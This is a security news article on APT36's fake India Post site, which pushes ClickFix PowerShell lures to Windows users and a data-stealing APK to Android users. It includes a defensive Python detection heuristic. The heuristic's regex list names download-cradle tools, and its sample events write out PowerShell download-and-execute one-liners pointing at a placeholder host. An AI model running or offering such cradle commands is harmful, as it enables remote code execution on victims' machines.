APT36 Spoofs India Post Website to Infect Windows and Android Users with Malware

Mar 27, 2025 | Ravie Lakshmanan | Mobile Security / Malware

India Post Website

An advanced persistent threat (APT) group with ties to Pakistan has been linked to a fake website masquerading as India's public sector postal system, part of a campaign designed to infect both Windows and Android users in the country.

Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as Transparent Tribe.

The fraudulent website mimicking India Post is named "postindia[.]site." Users who land on the site from Windows systems are prompted to download a PDF document, whereas those visiting from an Android device are served a malicious application package ("indiapost.apk") file.


"When accessed from a desktop, the site delivers a malicious PDF file containing 'ClickFix' tactics," CYFIRMA said. "The document instructs users to press the Win + R keys, paste a provided PowerShell command into the Run dialog, and execute it – potentially compromising the system."

An analysis of the EXIF data associated with the dropped PDF shows that it was created on October 23, 2024, by an author named "PMYLS," a likely reference to Pakistan's Prime Minister Youth Laptop Scheme. The domain impersonating India Post was registered about a month later on November 20, 2024.


The PowerShell code is designed to download a next-stage payload from a remote server ("88.222.245[.]211") that's currently inactive.
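The ClickFix chain described above leaves a recognisable trace in endpoint telemetry: PowerShell spawned by explorer.exe (the parent of anything launched from the Win + R Run dialog) with a download-and-execute cradle on its command line. The following detection heuristic is an added example written for this article, not CYFIRMA's or the campaign's code; the event field names and the sample events are constructed, and the IP address is a documentation-range placeholder rather than the server named in the report.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Heuristic: PowerShell whose parent is explorer.exe (what the Win+R Run
dialog uses) and whose command line carries a download/execute cradle.
Field names and events below are constructed for this example."""
import re

# Typical cradle fragments; two or more together is the alert threshold.
CRADLE_PATTERNS = [
    re.compile(p, re.IGNORECASE) for p in (
        r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
        r"downloadstring|downloadfile|net\.webclient",
        r"\biex\b|invoke-expression",
        r"-enc(odedcommand)?\s",
        r"-w(indowstyle)?\s+hidden",
    )
]
RUN_DIALOG_PARENT = "explorer.exe"


def is_clickfix_like(event: dict) -> bool:
    """True when PowerShell is launched from explorer.exe with a cradle."""
    image = event.get("image", "").lower()
    parent = event.get("parent_image", "").lower()
    cmd = event.get("command_line", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return False
    if not parent.endswith(RUN_DIALOG_PARENT):
        return False
    return sum(1 for p in CRADLE_PATTERNS if p.search(cmd)) >= 2


def triage(events: list) -> list:
    """Return the pids of events matching the heuristic."""
    return [e["pid"] for e in events if is_clickfix_like(e)]


# Constructed sample events; 203.0.113.10 is a placeholder, not a real C2.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 1001, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr http://203.0.113.10/s.ps1)"'},
    {"pid": 1002, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell Get-Process"},  # benign interactive use
    {"pid": 1003, "image": PS, "parent_image": r"C:\Tools\updater.exe",
     "command_line": 'powershell -c "iwr http://203.0.113.10/x | iex"'},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))  # [1001]
```

Event 1003 is deliberately not flagged by this rule because its parent is not explorer.exe; a separate cradle-only rule would catch it, at the cost of more noise from legitimate installers.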

On the other hand, when the same site is visited from an Android device, it urges users to install its mobile app for a "better experience." The app, once installed, requests extensive permissions that allow it to harvest and exfiltrate sensitive data, including contact lists, current location, and files from external storage.

"The Android app changes its icon to mimic a non-suspicious Google Accounts icon to conceal its activity, making it difficult for the user to locate and uninstall the app when they want to remove it," the company said. "The app also has a feature to force users to accept permissions if they are denied in the first instance."

The malicious app is also designed to run in the background continuously even after a device restart, while explicitly seeking permissions to ignore battery optimization.

"ClickFix is increasingly being exploited by cybercriminals, scammers, and APT groups, as reported by other researchers observing its use in the wild," CYFIRMA said. "This emerging tactic poses a significant threat as it can target both unsuspecting and tech-savvy users who may not be familiar with such methods."